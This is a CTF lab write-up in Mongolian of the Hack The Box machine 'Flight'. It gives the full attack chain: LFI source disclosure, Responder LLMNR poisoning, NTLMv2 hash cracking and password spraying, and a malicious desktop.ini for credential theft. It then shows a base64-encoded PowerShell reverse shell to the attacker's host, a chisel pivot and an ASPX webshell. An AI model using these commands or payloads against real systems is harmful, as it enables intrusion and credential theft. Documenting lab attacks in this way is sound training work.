Page cover image

โœˆ๏ธFlight

File Disclosure, Enumeration, LLMNR Poisoning, Pivoting, RunasCS.EXE

Nmap-ะณ ะฐัˆะธะณะปะฐะถ scanning ั…ะธะนััะฝ. ะœัะดััะถ ำฉำฉั€ ะทำฉะฝะดำฉำฉ Scanner ะฐัˆะธะณะปะฐั… ะฑะพะปะพะผะถั‚ะพะน ัˆาฏาฏ. ะะธะนั‚ะปัะณ 22, 21, 23-ั€ ะฟะพั€ั‚ัƒัƒะด ั…ะฐะฐะปั‚ั‚ะฐะน ะฑะฐะนัะฐะฝ ะฑำฉะณำฉำฉะด ัะพะฝะธั€ั…ะพะป ั‚ะฐั‚ัะฐะฝ ะฟะพั€ั‚ ะฝัŒ 445 ( SMB ), 389 ( LDAP ) ะฑะฐะนะปะฐะฐ

โ”Œโ”€โ”€(rootใ‰ฟkali)-[~]
โ””โ”€# nmap -A -T5 -p- --min-rate 1000 10.10.11.187
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-13 01:46 EST
Nmap scan report for school.flight.htb (10.10.11.187)
Host is up (0.30s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49697/tcp open  unknown
49709/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 197.92 seconds

Subdomain-ัƒัƒะดั‹ะณ Wordlist-ััั ั…ะฐะนัะฐะฝ. ะะธะปััะฝ ะพะปะพะฝ ะธะปัั€ั† ะณะฐั€ัะฐะฝ ะฑำฉะณำฉำฉะด าฏาฏะฝััั school ัะพะฝะธั€ั…ะพะปั‚ะพะน ัะฐะฝะฐะณะดะฐะฐะด ั‚ัƒั€ัˆัะฐะฝ.

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://flight.htb/
Total requests: 19966

=====================================================================
ID           Response   Lines    Word       Chars       Payload              
=====================================================================

000000624:   200        90 L     412 W      3996 Ch     "school" 

Subdomain-ะณ ะพะปัะพะฝ ัƒั‡ั€ะฐะฐั ะผัะดััะถ Directory bruteforce ั…ะธะนั… ั…ัั€ัะณั‚ัะน.

dirsearch -u http://school.flight.htb

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kayiz/Desktop/HTB/Flights/reports/http_school.flight.htb/_22-12-13_01-56-16.txt

Target: http://school.flight.htb/

Home button ะดััั€ ะดะฐั€ะฐั…ะฐะด LFI ะฑะฐะนะถ ะฑะพะปะพั…ะพะพั€ /index.php?view=home ะณัััะฝ ะฟะฐั€ะฐะผะตั‚ั€ ะณะฐั€ั‡ ะธั€ััะฝ. ะ“ัั…ะดัั ัะฝะณะธะนะฝ ../../../../etc/passwd ัะฒัƒัƒะปะฐั…ะฐะด Suspicious Activity Blocked response-ะณ ั…ะฐั€ัƒัƒะปัะฐะฝ.

?view= -ะณ ะฐัˆะธะณะปะฐะฐะด ั‚ัƒั…ะฐะนะฝ ั…ัƒัƒะดัั‹ะณ ำฉำฉั€ะธะนะณ ะฝัŒ ะดัƒัƒะดะฐะถ Source Code-ะณ ั…ะฐั€ัะฐะฝ.

<?php

ini_set('display_errors', 0);
error_reporting(E_ERROR | E_WARNING | E_PARSE); 

if(isset($_GET['view'])){
$file=$_GET['view'];
if ((strpos(urldecode($_GET['view']),'..')!==false)||
    (strpos(urldecode(strtolower($_GET['view'])),'filter')!==false)||
    (strpos(urldecode($_GET['view']),'\\')!==false)||
    (strpos(urldecode($_GET['view']),'htaccess')!==false)||
    (strpos(urldecode($_GET['view']),'.shtml')!==false)
){
    echo "<h1>Suspicious Activity Blocked!";
    echo "<h3>Incident will be reported</h3>\r\n";
}else{
    echo file_get_contents($_GET['view']);	
}
}else{
    echo file_get_contents("C:\\xampp\\htdocs\\school.flight.htb\\home.html");
}
	
?>

Source Code-ะณ ั…ะฐั€ะฒะฐะป LFI-ั€ ะดะฐะผะถัƒัƒะปะถ Windows-ะฝ Share-ะปาฏาฏ ั…ะฐะปะดะปะฐะณะฐ ั…ะธะนั… ะฑะพะปะพะผะถั‚ะพะนะณ ั…ะฐั€ะถ ะฑะพะปะฝะพ. ะญะฝัั…าฏาฏ ั…ะฐะปะดะปะฐะณั‹ะณ LLMNR Poisoning ะณัะดัะณ ะฑำฉะณำฉำฉะด Poisoning ั…าฏััะปั‚ะธะนะณ ั…าฏั‡ััั€ ะธะปะณััะปะณาฏาฏะปััะด Response ะดััั€ ะฝัŒ ั‚ัƒั…ะฐะนะฝ ัะธัั‚ะตะผะธะนะฝ ะฝัƒัƒั† าฏะณะธะนะฝ Hash ัƒั‚ะณั‹ะณ capturing ั…ะธะนะถ ะฐะฒะฐั… ะฑะพะปะพะผะถั‚ะพะน ะฑะฐะนะดะฐะณ.

responder -I tun0 -wPv

ะ—ะฐ ะผัะดััะถ ะพะปะถ ะฐะฒัะฐะฝ Hash ัƒั‚ะณะฐะฐ ั‚ะฐะนะปะฐั…ั‹ะฝ ั‚ัƒะปะด John ะฐัˆะธะณะปะฐัะฐะฝ. ะญะฝัั…าฏาฏ Hash ะฝัŒ NTLMv2 ั„ะพั€ะผะฐั‚ั‚ะฐะน ะฑะฐะนะดะฐะณ.

svc_apache --> S@Ss!K@*t13

ะžะปะถ ะฐะฒัะฐะฝ ะฝัƒัƒั† าฏะณัั ะฐัˆะธะณะปะฐะถ Share-ะด ะฑาฏั€ั‚ะณัะปั‚ัะน ั…ัั€ัะณะปัะณั‡ะดะธะนะฝ ะผัะดััะปะปะธะนะณ Enumeration ั…ะธะนััะฝ.

crackmapexec smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users

ะฅัั€ัะณะปัะณั‡ะดะธะนะฝ ะฝัั€ะธะนะณ ะฐัˆะธะณะปะฐะถ Bruteforce ั…ะธะนั…ะธะนะฝ ั‚ัƒะปะด ะฝะธะนะปาฏาฏะปััะด ะฝัะณ าฏะณะธะนะฝ ัะฐะฝ ะฑะพะปะณะพัะพะฝ.

ะฅัั€ัะณะปัะณั‡ะดะธะนะฝ ะฝัั€ ะฑะพะปะพะฝ ะพะปะถ ะฐะฒัะฐะฝ ะฝัƒัƒั† าฏะณัั ะฐัˆะธะณะปะฐะฐะด Enumeration ั…ะธะนะถ S.Moon ั…ัั€ัะณะปัะณั‡ ัะฝัั…าฏาฏ ะฝัƒัƒั† าฏะณั‚ัะน ั‚ะฐะฐั€ะถ ะฑะฐะนะณะฐะฐะณ ะพะปัะพะฝ.

crackmapexec smb flight.htb -u user.txt -p 'S@Ss!K@*t13' --continue-on-success

psexec-ะณ ะฐัˆะธะณะปะฐะฐะด ะพั€ะพั… ะณัััะฝ ะฑะพะปะพะฒั‡ Access Denied ะฐะปะดะฐะฐ ำฉะณัำฉะฝ. ะขัะณัั…ััั€ s.moon ั…ัั€ัะณะปัะณั‡ Access ั…ะธะนั… ัั€ั…ะณาฏะน ะณัะดะณะธะนะณ ั…ะฐั€ะถ ะฑะพะปะฝะพ. ะขัะณะฒัะป ัั€ั…ะธะนะฝ ั‚าฏะฒัˆะธะฝ ะฝัŒ ั…ะฐะฝะณะฐะปั‚ั‚ะฐะน ั…าฏั€ัั… ั…ัั€ัะณะปัะณั‡ะธะนะฝ ะผัะดััะปะปะธะนะณ ะพะปะถ ะฐะฒัŠั.

impacket-psexec flight.htb/s.moon@g0.flight.htb

mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\10.10.14.22\test >> desktop.ini
attrib +s +h desktop.ini

IconResource ั…ัััะณั‚ Share-ะปาฏาฏ ั…ะฐะฝะดะฐั… IP ั…ะฐัะณ ะฑะพะปะพะฝ Folder ะฝัั€ัั ะทะฐะฐะถ ำฉะณัะฝำฉำฉั€ NTLM creds Steal ั…ะฐะปะดะปะฐะณั‹ะณ ะฑาฏั€ัะฝ ั…ะธะนั… ะฑะพะปะพะผะถั‚ะพะน ะฑะพะปะฝะพ. ะญะฝัั…าฏาฏ desktop.ini ั„ะฐะนะปั‹ะณ ำฉะผะฝำฉ ะฝัŒ ั…ะฐะฝะดะฐะถ ะฑะฐะนัะฐะฝ ัั€ั…ััั€ัั SMB-ั€าฏาฏ ั…ะฐะฝะดะฐะฐะฝ put ั…ะธะนะถ ำฉะณัำฉะฝ.

ะญะฝั าฏะตะด ะผัะดััะถ tun0 ะธะฝั‚ะตั€ั„ัะนั ะดััั€ Poisoning request ัˆะธะดััะด Listening ั…ะธะนััะฝ ะฑะฐะนั… ั‘ัั‚ะพะน. ะัƒัƒั† าฏะณะธะนะฝ Hash ัƒั‚ะณั‹ะณ ะพะปะพะพะด ะผำฉะฝ ะป Crack-ะดะฐะฐะด C.Bum ั…ัั€ัะณะปัะณั‡ะธะนะฝ ะฝัƒัƒั† าฏะณะธะนะณ ะพะปะฝะพ.

c.bum::flight.htb:4cd27f636efc3257:7F64B4D7A6217B4730D74EF1E01203C5:0101000000000000809D337E9380D901C51E38F813A6CDA300000000020008003000570044004E0001001E00570049004E002D00320052004F00560058004E003900550038004A00540004003400570049004E002D00320052004F00560058004E003900550038004A0054002E003000570044004E002E004C004F00430041004C00030014003000570044004E002E004C004F00430041004C00050014003000570044004E002E004C004F00430041004C0007000800809D337E9380D90106000400020000000800300030000000000000000000000000300000E227B834CC2C6B7192EFB78D231DCFC9EAB20E4ED178B616C3D6C6DCDD6462A90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320032000000000000000000

john bum --wordlist=/usr/share/wordlists/rockyou.txt

smbclient //flight.htb/Web -U c.bum

ะ—ะฐ ะฑะธะด ะฝะฐั€ SMB-ััั€ ะดะฐะผะถัƒัƒะปะถ ั…าฏัััะฝ ั„ะฐะนะปะฐะฐ ะฑะฐะนั€ัˆัƒัƒะปะฐั… ะฑะพะปะพะผะถั‚ะพะนะณ ะผัะดััะฝ ัƒั‡ั€ะฐะฐั ะผะธะฝะธะน ั…ัƒะฒัŒะด ะฑะพะป ัั…ะปััะด ั‚ัƒั…ะฐะนะฝ ัะตั€ะฒะตั€ะปาฏาฏ ะดัƒั€ั‚ะฐะน Webshell-ัั ะฑะฐะนั€ัˆัƒัƒะปะถ Comfortable ะพั€ั‡ะธะฝะณ ะฑาฏั€ะดาฏาฏะปะดัะณ ะดะฐั€ะฐะฐ ะฝัŒ ั…ะพะปะฑะพะปั‚ ั‚ะพะณั‚ะพะพั… Initial Access-ะณ ั…ะธะนั…ะธะนะณ ั…ะธั‡ััะดัะณ.

Initial Access ั…ะธะนั…ะดัั Powershell ะฐัˆะธะณะปะฐัะฐะฝ. Powershell-ะฝ Base64 encode ั…ะธะนััะฝ Payload-ะณ ะฐัˆะธะณะปะฐะถ ัั…ะฝะธะน ั…ะฐะฝะดะฐะปั‚ั‹ะณ ะพะปะถ ะฐะฒัะฐะฝ.

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAyACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Initial Access ะพะปะถ ะฐะฒัะฐะฝั‹ ะดะฐั€ะฐะฐ ะพะดะพะพ ะฐะถะธะปะปะฐะถ ะฑะฐะนะณะฐะฐ าฏะนะปั‡ะธะปะณััะฝาฏาฏะด ัะผะฐั€ ั‚ำฉะปำฉะฒั‚ัะน ะฑะฐะนะณะฐะฐะณ ั…ะฐั€ะฒะฐะป LISTENING ะณะพั€ะธะผั‚ะพะน ะผะฐัˆ ะพะปะพะฝ ะฟะพั€ั‚ ะดััั€ ัะตั€ะฒะธัาฏาฏะด ะฐะถะธะปะปะฐะถ ะฑะฐะนัะฐะฝ ะฑำฉะณำฉำฉะด ัะดะณััั€ าฏะนะปั‡ะธะปะณััะฝาฏาฏะดะธะนะณ ำฉำฉั€ ะดััั€ัั ะฐะถะธะปะปัƒัƒะปะถ

ะฏะผะฐั€ ัะผะทัะณ ะฑะฐะนะดะฐะปั‚ะฐะน ะฑะฐะนะฝะฐ ะฒั?

ะฏะฐะถ ั†ะฐะฐัˆะฐะฐ ะฑัƒัะฐะด าฏะนะปั‡ะธะปะณััั€าฏาฏ ัˆะธะปะถะธั… ะฒั? ะณัั… ะผัั‚ ะฐััƒัƒะดะปั‹ะณ ัˆะธะนะดัั…ะธะนะฝ ั‚ัƒะปะด Pivoting ั…ะธะนััะฝ ะฑะฐะนะณะฐะฐ ัˆาฏาฏ.

Chisel-ะณ ะฐัˆะธะณะปะฐะถ ัาฏะปะถััะฝะด Pivoting ั…ะธะนะฝั

Chisel ะฝัŒ 2 ั‚ำฉั€ำฉะป ะฑะฐะนะดะฐะณ ะฑำฉะณำฉำฉะด ัะฝั ัƒะดะฐะฐ ะฑะธ Windows-ะด ะทะพั€ะธัƒะปะถ ะณะฐั€ะณะฐัะฐะฝ ั…ัƒะฒะธะปะฑะฐั€ั‹ะณ ะฐัˆะธะณะปะฐัะฐะฝ.

chisel-ะณ ะฐัˆะธะณะปะฐั… ะทะฐะฐะฒะฐั€:

Client ั‚ะฐะปะดะฐะฐ:
.\chisel.exe client 10.10.14.22:9999 R:8000:127.0.0.1:8000

Server ั‚ะฐะปะดะฐะฐ:
chisel server --reverse -p 9999

ะ—ะฐ ำฉำฉั€ ะดััั€ัั าฏะนะปั‡ะธะปะณััะณ ะฝัŒ ะพั€ัƒัƒะปัะฝั‹ ะดะฐั€ะฐะฐ .aspx ะฐะฟะฟะปะธะบะตะนัˆะฝ ะฑะฐะนัะฐะฝ ัƒั‡ั€ะฐะฐั ASPX ะดััั€ ะฑะธั‡ััะฝ Webshell-ะณ ะฐัˆะธะณะปะฐะฒ.

PS C:\users\svc_apache\Desktop> copy cmd.aspx c:\inetpub\development\
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

ะ—ะฐ ั‚ัะณััะด าฏาฏะฝััั ั†ะฐะฐัˆะฐะฐ ะตั€ ะฝัŒ ะฐะผะฐั€ั…ะฐะฝ ะฑาฏะณะดััั€ัั ัะฝัั…าฏาฏ ัั€ั…าฏาฏะดะธะนะณ ะฐัˆะธะณะปะฐะฐะด ั…ัะปะฑะฐั€ Privilege Escalation ั…ะธะนั… ะฑะพะปะพะผะถั‚ะพะน

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled

Last updated